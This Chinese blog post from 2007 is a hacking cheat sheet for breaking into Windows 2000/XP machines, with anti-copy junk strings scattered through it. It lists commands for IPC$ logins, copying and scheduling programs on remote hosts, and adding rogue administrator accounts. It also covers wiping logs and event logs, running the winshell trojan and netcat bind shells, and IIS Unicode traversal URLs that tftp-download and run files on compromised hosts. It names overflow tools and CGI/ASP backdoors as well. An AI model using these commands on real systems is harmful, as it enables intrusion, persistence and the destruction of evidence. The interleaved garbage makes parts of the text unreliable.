成长中的软件销售,积累与分享
学者的头脑,
艺术家的心,
技术者的手,
劳动者的腿.
网管和黑客都必须知道的命令
上一篇 /
下一篇 2007-12-25 00:53:00
友商社区1e-m3v\Cf"G,kC%l,v4ERc
`a L9e/d [0
qCa+j~g-sN&j0
友商社区&G` ]J"_+v+?
与远程主机建立空管连接 net use \IP地址ipc$ "" /use:""友商社区eu
OSF-YD
以管理员身份登录远程主机 net use \IP地址ipc$ "密码" /use:"Administrator"友商社区]x4hj-dm
传送文件到远程主机WINNT目录下copy 本机目录路径程序 \IP地址admin$
&f:jNdL0
查看远程主机时间 net time \IP地址友商社区Ji4OXYQ#OV2m
定时启动某个程序 at \IP地址 02:18 readme.exe友商社区:I-C4J$O#M9AGt/o
查看共享 net view \IP地址友商社区!T6td6t%\g8sGe
查看netbios工作组列表 nBTstat -A IP地址
2Vt%VSg
_2C0
将远程主机C盘映射为自己的F盘 net use f: \IP地址c$ ""/user:"Administrator"友商社区q@[/ITAi
这两条把自己增加到管理员组: net user 用户名 密码 /add友商社区{l
fN$w9_7t[^z
net locaLGroup Administrators 用户名 /add
b7D"H-_P9j\0
断开连接 net use \IP地址ipc$ /delete友商社区q n!H([!Q9}S
扫尾:
"M'S0J E&h0
del C:winntsystem32logfiles*.*
)I(@7cA5rck0
del C:winntssytem32config*.evt友商社区;^GH*i&pL
del C:winntsystem32dTCLog*.*
tIyY^{0
del C:winntsystem32*.log友商社区)D_?&R"@
tT~
del C:winntsystem32*.txt友商社区wjlfBm0S7j%Q6k
del C:winnt*.txt友商社区j c
`'?7|]
del C:winnt*.log友商社区s!n
L4wc"P8M
一、netsvc.exe
;L:Z*Vr!d/h
i8cfZ o0
下面的命令分别是列出主机上的服务项目、查寻和远程启动主机的“时间任务”服务:
&q~;Q*J!K!G2T+Yc0
netsvc /list \IP地址
:[(K:nbG[ _4J(z S0
netsvc schedule \IP地址 /query友商社区o@8L$x-K_'yA;y
netsvc \IP地址 schedule /start友商社区^j}1[1F6sc/t3s9Z
T
二、OpenTelnet.exe
:ef }qz dp-d.Y0
远程启动主机的Telnet服务,并绑定端口到7878,例如:
Q.T+y k.}f/p(@0
OpenTelnet \IP地址 用户名 密码 1 7878
y0g!c/a8D7u\IA0
然后就可以telnet到主机的7878端口,进入DOS方式下:友商社区8Y*M/tHD%e0LiZ0e
telnet IP地址 7878友商社区
\Q)yaBT,K
三、winshell.exe
eDC \jS0
一个非常小的木马(不到6K),telnet到主机的7878端口,输入密码winshell,当看到CMD>后,可打下面的命令:
xSZWcb_SNK |0
p Path (查看winshell主程序的路径信息)
)d'~V3VYv
iN}0
b reBoot (重新启动机器)
T~:x%b}8b\l%J"w(G*k0
d shutDown (关闭机器)
\9_J5N%tf#s?$[9J0
s Shell (执行后你就会看到可爱的“C:>”)友商社区5^,p\L}A1|
x eXit (退出本次登录会话,此命令并不终止winshell的运行)
bp:G~B;ne0
CMD> http://.../srv.exe (通过http下载其他网站上的文件到运行winshell的机器上)友商社区+^!vejoX W
四、3389登陆器,GUI方式登录远程主机的
s9H$t1kYk
j~${0
五、elsave.exe
YxauG8l*F0
事件日志清除工具
n} ?#v%}@Y0
elsave -s \IP地址 -l "application" -C友商社区(n5S0I-IE$\6P
h
elsave -s \IP地址 -l "system" -C
[O1wQ)rW0H)E(KJ"uo0
elsave -s \IP地址 -l "security" -C友商社区6hE,D0h1t4I_T
执行后成功清除应用程序日志,系统日志,安全日志
/JXM"xQ\0
六、hbulot.exe友商社区ZVH ~R!z_5I{*P~!z
开启win2kserver和winxp的3389服务友商社区'f+R%Mbn3b
hbulot (/r)
S7i5g8p]0
七、nc.exe(netcat.exe)友商社区a3c\/X
RF,u+V
一个很好的工具,一些脚本程序都要用到它,也可做溢出后的连接用。
'uq#?.~&?D.oR0
想要连接到某处: nc (-options) hostname port(s)(ports) ...友商社区4{3|%i{;L7~+Cp
绑定端口等待连接: nc -l -p port (-options) (hostname) (port)友商社区$bd Xk]`
参数:友商社区*x&Z{]$E
-e prog 程序重定向,一旦连接,就执行 (危险!)
J'KDZ&VR0
-g gateway source-routing hop point(s), up to 8
:X3BzA-tW0
-G num source-routing pointer: 4, 8, 12, ...
*q~ Fe+ISwmp0
-h 帮助信息友商社区N^0}[8J%Y$m
-i secs 延时的间隔
(eG(N&N8Qt)?6P/e%C0
-l 监听模式,用于入站连接
s5`:@htG]0
-n 指定数字的IP地址,不能用hostname友商社区3Ak^9bJ4[
-o file 记录16进制的传输
q$@
gkqe$xx2j!n0
-p port 本地端口号
|)w1J0|;P9U~X0vF0
-r 任意指定本地及远程端口
g8U$P(o'@@,[
O0
-s addr 本地源地址
"]R3L
}3}IU Zi*mG0
-u UDP模式友商社区:f3{-`VL(u&X9n
-v 详细输出——用两个-v可得到更详细的内容
7VU;|1f
a](@
O0
-w secs timeout的时间
/X0S#z].x P:A"\0
-z 将输入输出关掉——用于扫描时友商社区^_\8P3Bh C
八、TFTPD32.EXE
s+uG.b a#Q9O+k0
把自己的电脑临时变为一台FTP服务器,让肉鸡来下载文件,tftp命令要在肉鸡上执行,通常要利用Unicode漏洞或telnet到肉鸡,例如:友商社区J!zOt2^&nTMD
http://IP地址/s cripts/..%255c..%255c/winnt/system32/cmd.exe?/c tftp -i 本机IP地址 get 文件名 c:winntsystem32文件名友商社区f3m8}'m{#k&q)BRFb
然后可以直接令文件运行:
h _SreaiV9KD0
http://IP地址/s cripts/..%255c..%255c/winnt/system32/cmd.exe?/c+文件名
8p@nLy#uc0
九、prihack.exe是IIS的printer远程缓冲区溢出工具友商社区!@!{TAF(K4j
idqover.exe是溢出idq的,选择“溢出后在一个端口监听”,然后用telnet连接它的监听端口,如果溢出成功,一连它的端口,绑定的命令马上执行。xploit.exe是一个图形界面的ida溢出,成功以后winxp下需要打winxp。友商社区7Tue,H-w
一○、ntis.exe、cmd.exe和cmdasp.asp是三个cgi-backdoor,exe要放到cgi-bin目录下,asp放到有ASP执行权限的目录。然后用IE浏览器连接.
Y(`2DhYF0
友商社区?5V6pVo3]+]
t9mt/U)LB8E"l0友商社区uVVO
mUhM,@
友商社区NHb({IY5U
Bgjs Bs
导入论坛
引用链接
收藏
分享给好友
推荐到圈子
管理
举报
TAG: